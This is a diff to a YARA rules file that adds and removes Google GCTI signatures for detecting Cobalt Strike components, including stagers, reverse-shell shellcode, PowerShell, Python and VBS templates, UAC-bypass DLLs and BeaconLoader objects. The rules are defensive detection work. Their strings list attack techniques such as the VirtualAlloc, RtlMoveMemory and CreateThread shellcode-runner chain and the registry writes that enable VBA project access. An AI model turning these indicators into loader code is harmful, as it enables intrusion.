+		$stub56 = {fc e8 ?? ?? ?? ?? [1-32] eb 2b 5d 8b ?? ?? 83 c5 ?4 8b ?? ?? 31 ?? 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e8 5? ff e? e8 d? ff ff ff}
 
 	condition:
-		all of them
+		any of them
 }
-rule GCTI_Cobaltstrike_Resources_Bypassuactoken_Dll_V3_11_To_V3_14
+rule GCTI_Cobaltstrike_Resources_Template_Py_V3_3_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/bypassuactoken.dll from v3.11 to v3.14 (32-bit version)"
+		description = "Cobalt Strike's resources/template.py signature for versions v3.3 to v4.x"
 		author = "gssincla@google.com"
-		id = "b9f25fa5-bd1d-5ba0-9b1d-bb97e1dbf76b"
+		id = "16aef9a9-b217-5462-93dc-f6273c99ddd0"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_Dll_v3_11_to_v3_14.yara#L17-L151"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Py_v3_3_to_v4_x.yara#L17-L36"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "df1c7256dfd78506e38c64c54c0645b6a56fc56b2ffad8c553b0f770c5683070"
-		logic_hash = "fe0780b7f4c16b55cfa00ea7de4da8ce349ec8a72de763b72e816ebc8e934b6d"
+		hash = "d5cb406bee013f51d876da44378c0a89b7b3b800d018527334ea0c5793ea4006"
+		logic_hash = "3c26cea4b8f2b200bf58e939ae9ead7a7339d4ec0de8c72b3d9c7da897600081"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$isHighIntegrityProcess = {
-			5?
-			5?
-			5?
-			8B ??
-			6A 19
-			5?
-			FF 15 [4]
-			85 C0
-			75 ??
-			FF 15 [4]
-			83 ?? 7A
-			75 ??
-			FF [2]
-			5?
-			FF 15 [4]
-			8B ??
-			8D [2]
-			5?
-			FF [2]
-			5?
-			6A 19
-			5?
-			FF 15 [4]
-			85 C0
-			74 ??
-			FF ??
-			FF 15 [4]
-			8A ??
-			FE C8
-			0F B6 C0
-			5?
-			FF ??
-			FF 15 [4]
-			B? 01 00 00 00
-			5?
-			81 ?? 00 30 00 00
-		}
-		$executeTaskmgr = {
-			6A 3C
-			8D ?? C4
-			8B ??
-			6A 00
-			5?
-			8B ??
-			E8 [4]
-			83 C4 0C
-			C7 [2] 3C 00 00 00
-			8D [2]
-			C7 [2] 40 00 00 00
-			C7 [6]
-			C7 [2] 00 00 00 00
-			5?
-			C7 [2] 00 00 00 00
-			C7 [6]
-			C7 [2] 00 00 00 00
-			FF 15 [4]
-			FF 75 FC
-		}
+		$arch = "platform.architecture()"
+		$nope = "WindowsPE"
+		$alloc = "ctypes.windll.kernel32.VirtualAlloc"
+		$movemem = "ctypes.windll.kernel32.RtlMoveMemory"
+		$thread = "ctypes.windll.kernel32.CreateThread"
+		$wait = "ctypes.windll.kernel32.WaitForSingleObject"
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Httpstager64_Bin_V3_2_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Reverse_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/httpstager64.bin signature for versions v3.2 to v4.x"
+		description = "Cobalt Strike's resources/reverse.bin signature for versions 2.5 to 4.x"
 		author = "gssincla@google.com"
-		id = "5530dce8-e5a1-5133-9b05-464e3397084a"
+		id = "182dbcd0-1180-5516-abe3-cf2eebbd0e39"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager64_Bin_v3_2_through_v4_x.yara#L17-L85"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse_Bin_v2_5_through_v4_x.yara#L17-L104"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ad93d1ee561bc25be4a96652942f698eac9b133d8b35ab7e7d3489a25f1d1e76"
-		logic_hash = "23666169565c6b3e5fa71767dc31096e7a25be049eeab16b074053d76c97c70b"
+		hash = "887f666d6473058e1641c3ce1dd96e47189a59c3b0b85c8b8fccdd41b84000c7"
+		logic_hash = "c6c4fc477c7654ec07eb6ef4c6d53805a9b4881ba288754e1f50b3e4b134333c"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
 		$apiLocator = {
-			48 [2]
+			31 ??
 			AC
-			41 [2] 0D
-			41 [2]
+			C1 ?? 0D
+			01 ??
 			38 ??
 			75 ??
-			4C [4]
-			45 [2]
+			03 [2]
+			3B [2]
 			75 ??
 			5?
-			44 [2] 24
-			49 [2]
-			66 [4]
-			44 [2] 1C
-			49 [2]
-			41 [3]
-			48
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
 		}
-		$postInternetOpenJmp = {
-			41 ?? 3A 56 79 A7
-			FF ??
-			EB
+		$ws2_32 = {
+			5D
+			68 33 32 00 00
+			68 77 73 32 5F
+		}
+		$connect = {
+			6A 10
+			5?
+			5?
+			68 99 A5 74 61
 		}
 
 	condition:
-		$apiLocator and $postInternetOpenJmp
-}
-rule GCTI_Cobaltstrike_Resources__Template_Vbs_V3_3_To_V4_X
-{
-	meta:
-		description = "Cobalt Strike's resources/btemplate.vbs signature for versions v3.3 to v4.x"
-		author = "gssincla@google.com"
-		id = "62f35d02-1e4e-5651-b575-888ce06b8bdd"
-		date = "2022-11-18"
-		modified = "2022-11-22"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Vbs_v3_3_to_v4_x.yara#L17-L41"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "e0683f953062e63b2aabad7bc6d76a78748504b114329ef8e2ece808b3294135"
-		logic_hash = "c9df0e287eb0eacf7c6cfcf3f6d1043ae6f2fdacd3b22bd42ac71f4b0d7226ff"
-		score = 75
-		quality = 83
-		tags = ""
-
-	strings:
-		$ea = "Excel.Application" nocase
-		$vis = "Visible = False" nocase
-		$wsc = "Wscript.Shell" nocase
-		$regkey1 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" nocase
-		$regkey2 = "\\Excel\\Security\\AccessVBOM" nocase
-		$regwrite = ".RegWrite" nocase
-		$dw = "REG_DWORD"
-		$code = ".CodeModule.AddFromString"
-		$ao = { 41 75 74 6f 5f 4f 70 65 6e }
-		$da = ".DisplayAlerts"
-
-	condition:
-		all of them
+		$apiLocator and $ws2_32 and $connect
 }
 rule GCTI_Cobaltstrike_Resources_Artifact64_V1_49_V2_X_V3_0_V3_3_Thru_V3_14
 {
@@ -76567,111 +77561,484 @@ rule GCTI_Cobaltstrike_Resources_Artifact64_V3_14_To_V4_X
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Reverse64_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Template_X64_Ps1_V3_0_To_V4_X_Excluding_3_12_3_13
 {
 	meta:
-		description = "Cobalt Strike's resources/reverse64.bin signature for versions v2.5 to v4.x"
+		description = "Cobalt Strike's resources/template.x64.ps1, resources/template.hint.x64.ps1 and resources/template.hint.x32.ps1 from v3.0 to v4.x except 3.12 and 3.13"
 		author = "gssincla@google.com"
-		id = "966e6e4c-85e2-5c94-8245-25367802b7d2"
+		id = "5a808113-aacb-56ca-b3ec-166c73c54b85"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse64_Bin_v2_5_through_v4_x.yara#L17-L99"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x64_Ps1_v3_0_to_v4_x_excluding_3_12_3_13.yara#L17-L37"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "d2958138c1b7ef681a63865ec4a57b0c75cc76896bf87b21c415b7ec860397e8"
-		logic_hash = "c657234156293b9ac363b677490739ab0b5cc2ef149c9d9c37332dab9bb012f6"
+		hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87"
+		logic_hash = "80823b8590004686ebd83958cad16094ea2f6958a837d87934507531a00df77a"
+		score = 75
+		quality = 81
+		tags = ""
+
+	strings:
+		$dda = "[AppDomain]::CurrentDomain.DefineDynamicAssembly" nocase
+		$imm = "InMemoryModule" nocase
+		$mdt = "MyDelegateType" nocase
+		$rd = "New-Object System.Reflection.AssemblyName('ReflectedDelegate')" nocase
+		$data = "[Byte[]]$var_code = [System.Convert]::FromBase64String(" nocase
+		$64bitSpecific = "[IntPtr]::size -eq 8"
+		$mandatory = "Mandatory = $True"
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Template__X32_X64_Ps1_V1_45_To_V2_5_And_V3_11_To_V3_14
+{
+	meta:
+		description = "Cobalt Strike's resources/template.x64.ps1, resources/template.x32 from v3.11 to v3.14 and resources/template.ps1 from v1.45 to v2.5 "
+		author = "gssincla@google.com"
+		id = "c9fa6a39-0098-5dde-9762-94bc6b2df299"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template__x32_x64_Ps1_v1_45_to_v2_5_and_v3_11_to_v3_14.yara#L17-L43"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87"
+		logic_hash = "5196f111f257239d2e7e4ca342e7fc8bac1687743bc8c7ff23addf1f094b2e93"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$apiLocator = {
-			48 [2]
-			AC
-			41 [2] 0D
-			41 [2]
-			38 ??
-			75 ??
-			4C [4]
-			45 [2]
-			75 ??
-			5?
-			44 [2] 24
-			49 [2]
-			66 [4]
-			44 [2] 1C
-			49 [2]
-			41 [3]
-			48
-		}
-		$calls = {
-			48 89 C1
-			41 BA EA 0F DF E0
-			FF D5
-			48 [2]
-			6A ??
-			41 ??
-			4C [2]
-			48 [2]
-			41 BA 99 A5 74 61
-			FF D5
-		}
+		$importVA = "[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc" nocase
+		$importCT = "[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread" nocase
+		$importWFSO = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject" nocase
+		$compiler = "New-Object Microsoft.CSharp.CSharpCodeProvider" nocase
+		$params = "New-Object System.CodeDom.Compiler.CompilerParameters" nocase
+		$paramsSys32 = ".ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" nocase
+		$paramsGIM = ".GenerateInMemory = $True" nocase
+		$result = "$compiler.CompileAssemblyFromSource($params, $assembly)" nocase
 
 	condition:
-		$apiLocator and $calls
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Bypassuac_Dll_V1_49_To_V3_14_And_Sleeve_Bypassuac_Dll_V4_0_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Artifact32Svc_Exe_V3_1_V3_2_V3_14_And_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/bypassuac(-x86).dll from v1.49 to v3.14 (32-bit version) and sleeve/bypassuac.dll from v4.0 to at least v4.4"
+		description = "Cobalt Strike's resources/artifact32svc(big).exe signature for versions 3.1 and 3.2 (with overlap with v3.14 through v4.x)"
 		author = "gssincla@google.com"
-		id = "614046b5-cf81-56a5-8824-b3a7e14a8ed5"
+		id = "732169be-e334-5774-b0ac-54b217a8b681"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_Dll_v1_49_to_v3_14_and_Sleeve_Bypassuac_Dll_v4_0_to_v4_x.yara#L17-L94"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32svc_Exe_v1_49_to_v4_x.yara#L53-L77"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "91d12e1d09a642feedee5da966e1c15a2c5aea90c79ac796e267053e466df365"
-		logic_hash = "7d59c0286f1936e386519a919472d01581b68a8167c89bd3cd3108d45251119a"
+		hash = "871390255156ce35221478c7837c52d926dfd581173818620b738b4b029e6fd9"
+		logic_hash = "b55211fc2dbe100edb19c3f3a000be513144e3556c4bce8a29a3c0b77451ba96"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$deleteFileCOM = {
-			A1 [4]
-			6A 00
-			8B ??
-			5?
-			5?
-			FF ?? 48
-			85 ??
-			75 ??
-			A1 [4]
-			5?
-			8B ??
-			FF ?? 54
-		}
-		$copyFileCOM = {
-			A1 [4]
-			6A 00
-			FF [2]
-			8B ??
-			FF [5]
-			FF [5]
-			5?
-			FF ?? 40
-			85 ??
-			[2 - 6]
-			A1 [4]
-			5?
-			8B ??
-			FF ?? 54
-		}
+		$decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 }
+
+	condition:
+		$decoderFunc
+}
+rule GCTI_Cobaltstrike_Resources_Template_Sct_V3_3_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/template.sct signature for versions v3.3 to v4.x"
+		author = "gssincla@google.com"
+		id = "9d2b1dfa-5f76-503f-9198-6ed0d039e0cb"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Sct_v3_3_to_v4_x.yara#L17-L38"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142"
+		logic_hash = "8868445ced4945c469764b7f311d6cb11c99cf0f2d770113e5e617e0187a962c"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$scriptletstart = "<scriptlet>" nocase
+		$registration = "<registration progid=" nocase
+		$classid = "classid=" nocase
+		$scriptlang = "<script language=\"vbscript\">" nocase
+		$cdata = "<![CDATA["
+		$scriptend = "</script>" nocase
+		$antiregistration = "</registration>" nocase
+		$scriptletend = "</scriptlet>"
+
+	condition:
+		all of them and @scriptletstart [ 1 ] < @registration [ 1 ] and @registration [ 1 ] < @classid [ 1 ] and @classid [ 1 ] < @scriptlang [ 1 ] and @scriptlang [ 1 ] < @cdata [ 1 ]
+}
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X86_O_V4_3_V4_4_V4_5_And_V4_6
+{
+	meta:
+		description = "Cobalt Strike's sleeve/BeaconLoader.HA.x86.o (HeapAlloc) Versions 4.3 through at least 4.6"
+		author = "gssincla@google.com"
+		id = "0ee3fa6f-367c-596f-a3bc-3bcfa61b97aa"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L17-L59"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "8e4a1862aa3693f0e9011ade23ad3ba036c76ae8ccfb6585dc19ceb101507dcd"
+		logic_hash = "d02257bc556d0b1675997ab6af1b28cf5f498855d6254e3c1cd7eb4a0c4d2715"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$core_sig = {
+      C6 45 F0 48
+      C6 45 F1 65
+      C6 45 F2 61
+      C6 45 F3 70
+      C6 45 F4 41
+      C6 45 F5 6C
+      C6 45 F6 6C
+      C6 45 F7 6F
+      C6 45 F8 63
+      C6 45 F9 00
+    }
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X86_O_V4_3_V4_4_V4_5_And_V4_6
+{
+	meta:
+		description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x86.o (MapViewOfFile) Versions 4.3 through at least 4.6"
+		author = "gssincla@google.com"
+		id = "3f7c0553-989e-53e7-87a9-3fa1c47f4b62"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L61-L111"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "cded3791caffbb921e2afa2de4c04546067c3148c187780066e8757e67841b44"
+		logic_hash = "dd831fb01a403213c06e3d07daf3da5f56655619a686149f9d4beec2331fe6ca"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$core_sig = {
+      C6 45 EC 4D
+      C6 45 ED 61
+      C6 45 EE 70
+      C6 45 EF 56
+      C6 45 F0 69
+      C6 45 F1 65
+      C6 45 F2 77
+      C6 45 F3 4F
+      C6 45 F4 66
+      C6 45 F5 46
+      C6 45 F6 69
+      C6 45 F7 6C
+      C6 45 F8 65
+      C6 45 F9 00
+    }
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X86_O_V4_3_V4_4_V4_5_And_V4_6
+{
+	meta:
+		description = "Cobalt Strike's sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6"
+		author = "gssincla@google.com"
+		id = "5f89c4be-f4c5-54d3-b923-d125de53902f"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L114-L194"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1"
+		logic_hash = "19b2297986bd72204fb117560cddcfb512f5db6c157d9730b5802bf9f968eef4"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$core_sig = {
+      C6 45 B0 56
+      C6 45 B1 69
+      C6 45 B2 72
+      C6 45 B3 74
+      C6 45 B4 75
+      C6 45 B5 61
+      C6 45 B6 6C
+      C6 45 B7 41
+      C6 45 B8 6C
+      C6 45 B9 6C
+      C6 45 BA 6F
+      C6 45 BB 63
+      C6 45 BC 00
+    }
+		$deobfuscator = {
+      8B 4D FC
+      83 C1 01
+      89 4D FC
+      8B 55 FC
+      3B 55 0C
+      73 19
+      0F B6 45 10
+      8B 4D 08
+      03 4D FC
+      0F BE 11
+      33 D0
+      8B 45 08
+      03 45 FC
+      88 10
+      EB D6
+    }
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X86_O_V4_3_V4_4_V4_5_And_V4_6
+{
+	meta:
+		description = "Cobalt Strike's sleeve/BeaconLoader.x86.o Versions 4.3 through at least 4.6"
+		author = "gssincla@google.com"
+		id = "32a47966-f3bb-52c3-a977-82a1b09ddf2c"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L196-L276"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1"
+		logic_hash = "cab5441ce7d919101fc04aa469e77b71a4c444443e44c752f18cbbc5b17ed5c2"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$core_sig = {
+      C6 45 B0 56
+      C6 45 B1 69
+      C6 45 B2 72
+      C6 45 B3 74
+      C6 45 B4 75
+      C6 45 B5 61
+      C6 45 B6 6C
+      C6 45 B7 41
+      C6 45 B8 6C
+      C6 45 B9 6C
+      C6 45 BA 6F
+      C6 45 BB 63
+      C6 45 BC 00
+    }
+		$deobfuscator = {
+      8B 4D FC
+      83 C1 01
+      89 4D FC
+      8B 55 FC
+      3B 55 0C
+      73 19
+      0F B6 45 10
+      8B 4D 08
+      03 4D FC
+      0F BE 11
+      33 D0
+      8B 45 08
+      03 45 FC
+      88 10
+      EB D6
+    }
+
+	condition:
+		$core_sig and not $deobfuscator
+}
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X64_O_V4_3_V4_4_V4_5_And_V4_6
+{
+	meta:
+		description = "Cobalt Strike's sleeve/BeaconLoader.HA.x64.o (HeapAlloc) Versions 4.3 through at least 4.6"
+		author = "gssincla@google.com"
+		id = "9b16ff13-2d8e-51dc-9f99-6c45eff76feb"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L281-L323"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "d64f10d5a486f0f2215774e8ab56087f32bef19ac666e96c5627c70d345a354d"
+		logic_hash = "b712a0c218e473f6c64fdead22b291d7fb0bac8ba614adcf1ba6431e854a5e65"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$core_sig = {
+      C6 44 24 38 48
+      C6 44 24 39 65
+      C6 44 24 3A 61
+      C6 44 24 3B 70
+      C6 44 24 3C 41
+      C6 44 24 3D 6C
+      C6 44 24 3E 6C
+      C6 44 24 3F 6F
+      C6 44 24 40 63
+      C6 44 24 41 00
+    }
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X64_O_V4_3_V4_4_V4_5_And_V4_6
+{
+	meta:
+		description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x64.o (MapViewOfFile) Versions 4.3 through at least 4.6"
+		author = "gssincla@google.com"
+		id = "38e063db-3d76-5a94-812a-945fcf46a232"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L326-L374"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "9d5b6ccd0d468da389657309b2dc325851720390f9a5f3d3187aff7d2cd36594"
+		logic_hash = "6224000342d87041fd3336656897479c644e94ea36fc061c27fcd64233047c2c"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$core_sig = {
+      C6 44 24 58 4D
+      C6 44 24 59 61
+      C6 44 24 5A 70
+      C6 44 24 5B 56
+      C6 44 24 5C 69
+      C6 44 24 5D 65
+      C6 44 24 5E 77
+      C6 44 24 5F 4F
+      C6 44 24 60 66
+      C6 44 24 61 46
+      C6 44 24 62 69
+      C6 44 24 63 6C
+      C6 44 24 64 65
+    }
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X64_O_V4_3_V4_4_V4_5_And_V4_6
+{
+	meta:
+		description = "Cobalt Strike's sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6"
+		author = "gssincla@google.com"
+		id = "8ca04f82-a8a8-5162-8b0c-8a7bce678a85"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L376-L456"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9"
+		logic_hash = "17402e952d71d02274a9b2814512b28a402e8d11a6c2a2375844fe24719f87a6"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$core_sig = {
+      C6 44 24 48 56
+      C6 44 24 49 69
+      C6 44 24 4A 72
+      C6 44 24 4B 74
+      C6 44 24 4C 75
+      C6 44 24 4D 61
+      C6 44 24 4E 6C
+      C6 44 24 4F 41
+      C6 44 24 50 6C
+      C6 44 24 51 6C
+      C6 44 24 52 6F
+      C6 44 24 53 63
+      C6 44 24 54 00
+    }
+		$deobfuscator = {
+      8B 04 24
+      FF C0
+      89 04 24
+      8B 44 24 28
+      39 04 24
+      73 20
+      8B 04 24
+      0F B6 4C 24 30
+      48 8B 54 24 20
+      0F BE 04 02
+      33 C1
+      8B 0C 24
+      48 8B 54 24 20
+      88 04 0A
+    }
 
 	condition:
 		all of them
 }
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X64_O_V4_3_V4_4_V4_5_And_V4_6
+{
+	meta:
+		description = "Cobalt Strike's sleeve/BeaconLoader.x64.o (Base) Versions 4.3 through at least 4.6"
+		author = "gssincla@google.com"
+		id = "07f751e4-f001-5b95-b229-31fbaa867cea"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L458-L555"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9"
+		logic_hash = "50d9da466e2c074b3fb634203c8840d45da8f8e3094790d7c4354a5703b583ef"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$core_sig = {
+      33 C0
+      83 F8 01
+      74 63
+      48 8B 44 24 20
+      0F B7 00
+      3D 4D 5A 00 00
+      75 45
+      48 8B 44 24 20
+      48 63 40 3C
+      48 89 44 24 28
+      48 83 7C 24 28 40
+      72 2F
+      48 81 7C 24 28 00 04 00 00
+      73 24
+      48 8B 44 24 20
+      48 8B 4C 24 28
+      48 03 C8
+      48 8B C1
+      48 89 44 24 28
+      48 8B 44 24 28
+      81 38 50 45 00 00
+      75 02
+    }
+		$deobfuscator = {
+      8B 04 24
+      FF C0
+      89 04 24
+      8B 44 24 28
+      39 04 24
+      73 20
+      8B 04 24
+      0F B6 4C 24 30
+      48 8B 54 24 20
+      0F BE 04 02
+      33 C1
+      8B 0C 24
+      48 8B 54 24 20
+      88 04 0A
+    }
+
+	condition:
+		$core_sig and not $deobfuscator
+}
